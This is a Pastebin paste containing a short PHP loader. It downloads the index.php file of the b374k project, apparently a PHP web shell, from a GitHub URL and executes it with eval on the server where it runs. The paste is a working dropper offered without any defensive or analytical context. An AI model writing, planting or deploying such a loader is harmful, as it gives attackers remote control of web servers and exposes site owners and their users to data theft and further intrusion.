Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- // URL of the remote .txt file with PHP code
- $remote_url = "https://raw.githubusercontent.com/b374k/b374k/refs/heads/master/index.php";
- // Fetch the PHP code as a string
- $php_code = file_get_contents($remote_url);
- // Optional: check for errors
- if ($php_code === false) {
- die("Failed to fetch PHP code from remote server.");
- }
- // Execute the fetched code
- eval("?>$php_code");
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement